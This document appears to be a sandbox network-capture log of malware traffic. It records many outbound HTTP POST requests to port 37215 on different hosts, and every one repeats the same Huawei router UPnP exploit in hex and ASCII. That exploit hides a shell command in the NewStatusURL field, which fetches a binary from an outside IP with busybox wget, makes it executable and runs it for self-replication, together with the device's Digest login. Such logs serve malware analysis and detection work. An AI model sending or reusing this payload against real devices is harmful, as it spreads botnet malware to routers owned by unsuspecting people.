                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  597192.168.2.133702241.35.13.5937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.128279924 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  598192.168.2.135039047.223.124.7437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.128595114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  599192.168.2.136030841.101.20.2837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.128593922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  600192.168.2.135424441.189.136.25237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.128674030 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  601192.168.2.135741641.37.89.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.128695965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  602192.168.2.1335370197.184.68.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.128699064 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  603192.168.2.134708841.237.161.837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.128737926 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  604192.168.2.134699641.134.29.2737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.128758907 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  605192.168.2.1342688197.173.181.19237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.128765106 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  606192.168.2.1338632112.217.14.15937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.128777981 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 